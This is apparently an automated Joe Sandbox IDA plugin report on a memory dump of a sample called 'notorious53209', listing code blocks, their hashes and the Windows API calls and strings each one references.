                                                  • Opcode ID: c69cf5fd57a01f1a7427b38165f4a953e37f0926a0a7f702bd72038517aad0c1
                                                  • Instruction ID: 848c49be8b5b061208c4d27530ff1574a74bfda4f49a54b6c27f9b9fd4ee3148
                                                  • Opcode Fuzzy Hash: c69cf5fd57a01f1a7427b38165f4a953e37f0926a0a7f702bd72038517aad0c1
                                                  • Instruction Fuzzy Hash: F8E01A312502189FC710AF69D844AAAB7E8FF94760F048026F94AC7752DA71A8408BA1
                                                  APIs
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0090CBEE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: DialogNtdllProc_
                                                  • String ID:
                                                  • API String ID: 3239928679-0
                                                  • Opcode ID: 5ce427d8b8cc16466f58ff913f534cc7930522ccb85712a3e17851295197d218
                                                  • Instruction ID: 19c09fce34cdb3456107a66b93643fe315ac38bef15879cd3b45c7cf68911ef4
                                                  • Opcode Fuzzy Hash: 5ce427d8b8cc16466f58ff913f534cc7930522ccb85712a3e17851295197d218
                                                  • Instruction Fuzzy Hash: 04F09231244355BFDB21EF58DC05FD63B95EB0A720F044018FA11272E1CB707920E7A1
                                                  APIs
                                                  • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 008E4EEC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: mouse_event
                                                  • String ID:
                                                  • API String ID: 2434400541-0
                                                  • Opcode ID: a2ad7da4c59335d2bead6ca05db0c17fa743749597c4a8a542d9c66ed87d937d
                                                  • Instruction ID: f875ca3de9013b8bc52489da072f306a1cb6411a347e677351af8000ac021b73
                                                  • Opcode Fuzzy Hash: a2ad7da4c59335d2bead6ca05db0c17fa743749597c4a8a542d9c66ed87d937d
                                                  • Instruction Fuzzy Hash: 3CD05E9816478B39EC684B279C5FF770208F3037A5FD0714AB10AC94C1D8D16C506031
                                                  APIs
                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,008D88D1), ref: 008D8CB3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: LogonUser
                                                  • String ID:
                                                  • API String ID: 1244722697-0
                                                  • Opcode ID: daaca7d97e3745f0f9de32bf002d14655b14787bfbd318777ed96f4fd60f1e52
                                                  • Instruction ID: 5d24131771877721f1f99df45e9c99aaab165559e3e4a7ba93d32db8b102197b
                                                  • Opcode Fuzzy Hash: daaca7d97e3745f0f9de32bf002d14655b14787bfbd318777ed96f4fd60f1e52
                                                  • Instruction Fuzzy Hash: 70D05E3226450EAFEF018EA4DC01EAF3B69EB04B01F408111FE15C50A1C775D935AB60
                                                  APIs
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,008BBC0C,?,?,?,?,?,?), ref: 0090CC24
                                                    • Part of subcall function 0090B8EF: _memset.LIBCMT ref: 0090B8FE
                                                    • Part of subcall function 0090B8EF: _memset.LIBCMT ref: 0090B90D
                                                    • Part of subcall function 0090B8EF: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00947F20,00947F64), ref: 0090B93C
                                                    • Part of subcall function 0090B8EF: CloseHandle.KERNEL32 ref: 0090B94E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                  • String ID:
                                                  • API String ID: 2364484715-0
                                                  • Opcode ID: f22ac910450bdc48d7403e07df597c3b7a640a5bae62fb5f0f8ead9ae9078ece
                                                  • Instruction ID: c62945cabae8d6d5c0a16278a26cfda562d58cc3e84d8ad371f7b708031f7793
                                                  • Opcode Fuzzy Hash: f22ac910450bdc48d7403e07df597c3b7a640a5bae62fb5f0f8ead9ae9078ece
                                                  • Instruction Fuzzy Hash: 08E04676110218DFDB01EF04DD10E9537A9FB0D300F008411FE05172B2CB31A960EF50
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?,?,00881AEE,?,?,?), ref: 008816AB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: DialogLongNtdllProc_Window
                                                  • String ID:
                                                  • API String ID: 2065330234-0
                                                  • Opcode ID: dac28a95f153aae634251362aa61f275e8c9865b174fb0c48c603e7d0f410ad4
                                                  • Instruction ID: e241509ce593cce906dab78d68dc7497f1aa5877c5bbb80978c38b8f30e1dac4
                                                  • Opcode Fuzzy Hash: dac28a95f153aae634251362aa61f275e8c9865b174fb0c48c603e7d0f410ad4
                                                  • Instruction Fuzzy Hash: 26E0EC75104208BBCF15EF94DC21E643B26FB59714F108418FA455A2A1CA32A522EB51
                                                  APIs
                                                  • NtdllDialogWndProc_W.NTDLL ref: 0090CB75
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: DialogNtdllProc_
                                                  • String ID:
                                                  • API String ID: 3239928679-0
                                                  • Opcode ID: e74df03af8659f7b52b55e79dd485f241b4208c38dd6d26df9e9cf513331121c
                                                  • Instruction ID: de10fee1ca166b16ee83ba3653a7c0e8b495ba861d686938837f7f6e879de638
                                                  • Opcode Fuzzy Hash: e74df03af8659f7b52b55e79dd485f241b4208c38dd6d26df9e9cf513331121c
                                                  • Instruction Fuzzy Hash: 5BE04279254249AFDB01DF88DC95E963BA5AB1E700F014054FA1557362CB71A920EB62
                                                  APIs
                                                  • NtdllDialogWndProc_W.NTDLL ref: 0090CBA4
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: DialogNtdllProc_
                                                  • String ID:
                                                  • API String ID: 3239928679-0
                                                  • Opcode ID: bc03cfa736ddbaedaa117b826e8aaab70289720e9d5f322252a74be7ae83c5c2
                                                  • Instruction ID: b3f8dd98c75775a1a2c049c72e16f9879d2b8b3eed3037c1cd59b11093130560
                                                  • Opcode Fuzzy Hash: bc03cfa736ddbaedaa117b826e8aaab70289720e9d5f322252a74be7ae83c5c2
                                                  • Instruction Fuzzy Hash: 1EE0E279204209EFCB01DF88D844DD63BA5AB1E300F004054FA0547362CB71A820EBA2
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                    • Part of subcall function 0088201B: DestroyWindow.USER32(?), ref: 008820D3
                                                    • Part of subcall function 0088201B: KillTimer.USER32(-00000001,?), ref: 0088216E
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00881AE2,?,?), ref: 008816D4
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                  • String ID:
                                                  • API String ID: 2797419724-0
                                                  • Opcode ID: 862a0dc6ea0091a10f12f4df0e85634a2025c02c26ba56c495a0db13d73ac552
                                                  • Instruction ID: 21f21b86154bf0d7c742ce1dc8bf72bac7ab7f105db62215d92bfcd7b1114b0e
                                                  • Opcode Fuzzy Hash: 862a0dc6ea0091a10f12f4df0e85634a2025c02c26ba56c495a0db13d73ac552
                                                  • Instruction Fuzzy Hash: B5D01271140308BBDA20BB94DC17F593A1DEB54B50F408021BA04E91D3DA716910A65A
                                                  APIs
                                                  • GetUserNameW.ADVAPI32(?,?), ref: 008C2242
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: NameUser
                                                  • String ID:
                                                  • API String ID: 2645101109-0
                                                  • Opcode ID: a9e056546b4e260f10cf59328679d101abf3f915ee2851e984a95b6e4a3687b2
                                                  • Instruction ID: 99a9eaddc48583a74855bcbed1ac1434fd29dfbcf67e4b94dd27032207899883
                                                  • Opcode Fuzzy Hash: a9e056546b4e260f10cf59328679d101abf3f915ee2851e984a95b6e4a3687b2
                                                  • Instruction Fuzzy Hash: 30C04CF1C1410DDBDB15DB90DA98DEE77BCBB04314F104055A101F2101D7749B449E71
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 008AA36A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: b4ddfd8451a4e09fa23330b7cba626b8a6cf3298f099bcb41dbfaf8663e7b122
                                                  • Instruction ID: 3839de2d887679ae65c6d4375d6ab527ffb68ddb97dc360c686ca4555ebd2467
                                                  • Opcode Fuzzy Hash: b4ddfd8451a4e09fa23330b7cba626b8a6cf3298f099bcb41dbfaf8663e7b122
                                                  • Instruction Fuzzy Hash: 09A0123001810CABCA001B41EC044447F9CD6002E07004020F40C40421873255105580
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b2229784a5000e2636e412e9f023640a4eaf3810c221e5aee34ce0d72998ae40
                                                  • Instruction ID: 49436220916ba4a93e9735d98c5acfe112700b86a00de61bc27d97296e9f196d
                                                  • Opcode Fuzzy Hash: b2229784a5000e2636e412e9f023640a4eaf3810c221e5aee34ce0d72998ae40
                                                  • Instruction Fuzzy Hash: 6822147060561BCBDF28AB28C49467DB7A1FB03318F6C896BD842DB291DB34DD81DB61
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                  • Instruction ID: 2930c4a4e45338056cf2d74959c7bbe166d6d108fd167c5094990ccb8751adeb
                                                  • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                  • Instruction Fuzzy Hash: 31C172322051A309FF6D863D943413EBAE1BAA37B171A076DE4B3CB9D5EF20D564D620
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                  • Instruction ID: dae6609a801792cf7797df7ade5582011e272c0182ec75830cc413020c350e1f
                                                  • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                  • Instruction Fuzzy Hash: 41C183322051A30AEF7D463D943413EBBE1ABA37B171A176DE4B2DB9D4EF20D5249620
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 009038AF
                                                  • IsWindowVisible.USER32(?), ref: 009038D3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpperVisibleWindow
                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                  • API String ID: 4105515805-45149045
                                                  • Opcode ID: df0f811adc896ebc6dc065d8e9069b48357352507539181392c4e0816f48577b
                                                  • Instruction ID: 94e720b53f5320b69bc93fb839a2cba08ad8652b34f548e9a786a0cc9b2fad1d
                                                  • Opcode Fuzzy Hash: df0f811adc896ebc6dc065d8e9069b48357352507539181392c4e0816f48577b
                                                  • Instruction Fuzzy Hash: 80D17C30204315DFCB24EF18C495A6A77A9FF95344F148959F8C69B7E2CB25EE0ACB42
                                                  APIs
                                                  • SetTextColor.GDI32(?,00000000), ref: 0090A89F
                                                  • GetSysColorBrush.USER32(0000000F), ref: 0090A8D0
                                                  • GetSysColor.USER32(0000000F), ref: 0090A8DC
                                                  • SetBkColor.GDI32(?,000000FF), ref: 0090A8F6
                                                  • SelectObject.GDI32(?,?), ref: 0090A905
                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 0090A930
                                                  • GetSysColor.USER32(00000010), ref: 0090A938
                                                  • CreateSolidBrush.GDI32(00000000), ref: 0090A93F
                                                  • FrameRect.USER32(?,?,00000000), ref: 0090A94E
                                                  • DeleteObject.GDI32(00000000), ref: 0090A955
                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 0090A9A0
                                                  • FillRect.USER32(?,?,?), ref: 0090A9D2
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0090A9FD
                                                    • Part of subcall function 0090AB60: GetSysColor.USER32(00000012), ref: 0090AB99
                                                    • Part of subcall function 0090AB60: SetTextColor.GDI32(?,?), ref: 0090AB9D
                                                    • Part of subcall function 0090AB60: GetSysColorBrush.USER32(0000000F), ref: 0090ABB3
                                                    • Part of subcall function 0090AB60: GetSysColor.USER32(0000000F), ref: 0090ABBE
                                                    • Part of subcall function 0090AB60: GetSysColor.USER32(00000011), ref: 0090ABDB
                                                    • Part of subcall function 0090AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0090ABE9
                                                    • Part of subcall function 0090AB60: SelectObject.GDI32(?,00000000), ref: 0090ABFA
                                                    • Part of subcall function 0090AB60: SetBkColor.GDI32(?,00000000), ref: 0090AC03
                                                    • Part of subcall function 0090AB60: SelectObject.GDI32(?,?), ref: 0090AC10
                                                    • Part of subcall function 0090AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0090AC2F
                                                    • Part of subcall function 0090AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0090AC46
                                                    • Part of subcall function 0090AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0090AC5B
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                  • String ID:
                                                  • API String ID: 4124339563-0
                                                  • Opcode ID: e95b1e897fed3596620861284cdaca9af14f746b7b7025e4dea0f3ae89af34b5
                                                  • Instruction ID: c996092c723037b3dc574acaf8a655a9678b27f0c02ca595663e6c206cb32e44
                                                  • Opcode Fuzzy Hash: e95b1e897fed3596620861284cdaca9af14f746b7b7025e4dea0f3ae89af34b5
                                                  • Instruction Fuzzy Hash: 74A1AE7211C301EFDB209F64DC08E6B7BA9FF89321F104A29F962961E0D735DA44DB92
                                                  APIs
                                                  • DestroyWindow.USER32(00000000), ref: 008F77F1
